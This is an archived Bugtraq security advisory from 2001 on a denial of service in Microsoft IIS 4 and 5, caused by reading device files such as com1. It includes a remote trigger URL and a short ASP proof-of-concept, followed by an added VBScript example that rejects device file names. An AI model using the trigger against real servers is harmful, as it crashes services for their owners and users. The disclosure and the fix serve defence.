Bugtraq mailing list archives

NERF Advisory #4: MS IIS local and remote DoS


From: VIPER_SV /nerf/team/ <hax () r dot>
Date: Wed, 4 Jul 2001 23:35:27 +0700

                              --== NERF gr0up security advisory #4 ==--  
                                  MS IIS local and remote DoS      

1. Vulnerable software: IIS 4, 5

2. Description:
Opening and reading device files (com1, com2, etc.) using Scripting.FileSystemObject will crash the ASP processor
(asp.dll).
 
3. Local exploit:
If you have permission to create an .asp file, you can crash the ASP processor.
 
4. Remote exploit:
Sometimes a script takes a file name as a parameter, then opens and reads data from that file. Passing a device file
name as the parameter will crash the ASP processor.
http://host.int/scripts/script.asp?script=com1
 
5. Solution:
Fix Scripting.FileSystemObject (it has to check that the file exists before opening it).
 
6. ASP-Exploit:
 
<%
  Dim strFileName, objFSO, objFile
 
  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
 
  strFileName = "com1"
 
  Set objFile = objFSO.OpenTextFile(strFileName)
 
  Response.Write objFile.ReadAll
 
  objFile.Close

%>
 
7. Sorry:
for poor English
---------------------------------------------------
Found by buggzy (buggzy () nerf ru)
NERF Security gr0up (www.nerf.ru), Russia, 2001 (c)
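
Added example, not part of the original advisory or of any NERF or Microsoft code: one way a script that takes a file name from the query string (the `script` parameter in the URL in section 4) can reject device names before calling OpenTextFile. The function names, the `data/` directory, the allowed-character pattern and the reserved-name list are assumptions.

```vbscript
<%
Option Explicit

' Base names that Windows treats as devices, not files (assumed list).
Const DEVICE_NAMES = "|CON|PRN|AUX|NUL|COM1|COM2|COM3|COM4|COM5|COM6|COM7|COM8|COM9|LPT1|LPT2|LPT3|LPT4|LPT5|LPT6|LPT7|LPT8|LPT9|"

' True when the part before the first dot is a device name,
' so "com1" and "COM1.txt" are both caught.
Function IsDeviceName(strName)
  Dim strBase, intDot
  strBase = UCase(strName)
  intDot = InStr(strBase, ".")
  If intDot > 0 Then strBase = Left(strBase, intDot - 1)
  IsDeviceName = (InStr(DEVICE_NAMES, "|" & strBase & "|") > 0)
End Function

' Allowlist: a plain name with an optional short extension, no path
' separators, colons, spaces or trailing dots, and not a device name.
Function IsSafeFileName(strName)
  Dim objRe
  Set objRe = New RegExp
  objRe.Pattern = "^[A-Za-z0-9_-]{1,64}(\.[A-Za-z0-9]{1,8})?$"
  IsSafeFileName = objRe.Test(strName) And Not IsDeviceName(strName)
End Function

Dim strFileName, objFSO, objFile

' & "" turns a missing parameter into an empty string, which the allowlist rejects.
strFileName = Request.QueryString("script") & ""

If Not IsSafeFileName(strFileName) Then
  Response.Status = "400 Bad Request"
  Response.Write "Invalid file name"
  Response.End
End If

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
' "data/" is a hypothetical directory holding the files this script may serve.
Set objFile = objFSO.OpenTextFile(Server.MapPath("data/" & strFileName), 1) ' 1 = ForReading
If Not objFile.AtEndOfStream Then Response.Write Server.HTMLEncode(objFile.ReadAll)
objFile.Close
%>
```

This covers only the remote case in section 4; a user who can create .asp files (section 3) is not stopped by input validation in someone else's script.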

